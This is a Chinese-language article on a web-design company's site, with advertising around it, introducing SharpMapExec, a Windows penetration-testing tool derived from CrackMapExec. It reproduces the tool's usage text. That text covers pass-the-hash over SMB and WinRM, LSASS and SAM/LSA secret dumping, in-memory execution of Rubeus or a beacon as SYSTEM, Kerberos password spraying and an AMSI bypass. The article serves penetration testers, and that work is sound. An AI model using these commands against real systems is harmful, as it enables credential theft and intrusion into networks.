符合中小企业对网站设计、功能常规化式的企业展示型网站建设
本套餐主要针对企业品牌型网站、中高端设计、前端互动体验...
商城网站建设因基本功能的需求不同费用上面也有很大的差别...
手机微信网站开发、微信官网、微信商城网站...
这篇文章主要为大家展示了“SharpMapExec是什么”,内容简而易懂,条理清晰,希望能够帮助大家解决疑惑,下面让小编带领大家一起研究并学习一下“SharpMapExec是什么”这篇文章吧。
创新互联专注为客户提供全方位的互联网综合服务,包含不限于成都网站设计、做网站、泸溪网络推广、微信小程序、泸溪网络营销、泸溪企业策划、泸溪品牌公关、搜索引擎seo、人物专访、企业宣传片、企业代运营等,从售前售中售后,我们都将竭诚为您服务,您的肯定,是我们最大的嘉奖;创新互联为所有大学生创业者提供泸溪建站搭建服务,24小时服务热线:18982081108,官方网址:www.cdcxhl.com
SharpMapExec是一款针对网络渗透测试高级瑞士Knife,该工具基于CrackMapExec,可以将其理解为是CrackMapExec的优化版本。该工具的目的是简化网络渗透测试的任务操作,并提供一个多功能的渗透测试平台,该工具目前仅支持在Windows操作系统上运行,这也符合内部威胁模拟攻防的常见要求。
除了扫描访问权限外,它还可用于识别存在安全的错误配置以及过滤数据。数据过滤模块的核心实现思想是在远程计算机上执行最少的必要代码,为了完成这个任务,该工具将把所有的敏感数据下载到loot目录并在本地解析它们。
广大研究人员可以指定是否要使用Kerberos或NTLM身份验证,如果选择了Kerberos,那么该工具将创建一个令牌,并使用Rubeus导入或请求凭证。如果指定了NTLM,相应的工具将会创建一个线程并使用SharpKatz运行SetThreadToken(如果指定了NTLM散列)。
SharpMapExec.exe usage: --- Smb --- SharpMapExec.exe ntlm smb /user:USER /ntlm:HASH /domain:DOMAIN /computername:TARGET SharpMapExec.exe kerberos smb /computername:TARGET Available Smb modules /m:shares --- WinRm --- SharpMapExec.exe ntlm winrm /user:USER /password:PASSWORD /domain:DOMAIN /computername:TARGET SharpMapExec.exe kerberos winrm /computername:TARGET Available WinRm modules /m:exec /a:whoami (Invoke-Command) /m:exec /a:C:\beacon.exe /system (Invoke-Command as System) /m:comsvcs (Dump Lsass Process) /m:secrets (Dump and Parse Sam, Lsa, and System Dpapi blobs) /m:assembly /p:Rubeus.exe /a:dump (Execute Local C# Assembly in memory) /m:assembly /p:beacon.exe /system (Execute Local C# Assembly as System in memory) /m:download /path:C:\file /destination:file (Download File from Host) --- Domain --- SharpMapExec.exe kerbspray /users:USERS.TXT /passwords:PASSWORDS.TXT /domain:DOMAIN /dc:DC SharpMapExec.exe tgtdeleg
可以用于扫描管理员访问或可访问的SMB共享。
模块:
/m:shares (Scan enumerated shares for access)
该模块内置了AMSI绕过、JEA语言中断和JEA函数分析等功能,可用于代码执行、扫描PsRemote访问、易受攻击的JEA节点和数据过滤。
当前支持域密码喷射,以及为当前用户创建TGT,该TGT可与/ticket参数一起使用以获取当前上下文。
在某些使用Kerberos的场景下,可能会要求用户同步DC时钟并设置DNS:
net time \\DC01.hackit.local /set Get-NetAdapter ethernet0* | Set-DnsClientServerAddress -ServerAddresses @('192.168.1.10')
以上是“SharpMapExec是什么”这篇文章的所有内容,感谢各位的阅读!相信大家都有了一定的了解,希望分享的内容对大家有所帮助,如果还想学习更多知识,欢迎关注创新互联行业资讯频道!